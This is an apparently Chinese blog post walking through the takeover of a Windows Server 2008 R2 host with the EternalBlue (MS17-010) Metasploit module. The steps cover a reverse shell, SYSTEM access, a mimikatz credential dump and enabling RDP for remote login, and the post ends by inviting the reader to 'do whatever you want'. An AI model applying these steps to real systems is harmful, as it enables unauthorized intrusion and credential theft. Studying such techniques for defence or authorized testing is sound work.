永恒之蓝445 拿下服务器

上文提到内网渗透的时候发现服务器开启了445 接口

目标系统windows server 2008R2 x64
首先ping目标ip,连接通畅
使用service postgresql restart开启postgresql数据库

msfdb init初始化msf框架
msfconsole 打开msf控制台

msf框架db_nmap扫描端口得知目标开启了445端口,445为高危漏洞 ,可能存在永恒之蓝漏洞
search ms17(永恒之蓝编号)查找auxiliary验证payload
验证表明有很大几率存在永恒之蓝

search ms17 选择exploits攻击模块,为防止目标防火墙拦截通过show payloads 寻找reverse反向payload

set payload替换反弹payload
options设置lhost本地反弹链接
run启动

攻击成功。getuid查看获得 system权限
load mimikatz 加载猕猴桃板块使用kerberos抓取权限 获取到账户密码

background 将会话放到后台

nmap扫3389端口发现未开放

seaech enable_rdp (3389专用post后渗透攻击模块)
options设置session
run执行
nmap扫描ip发现3389已开
rdesktop 目标ip 用账户名密码远程登录成功….开始为所欲为

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值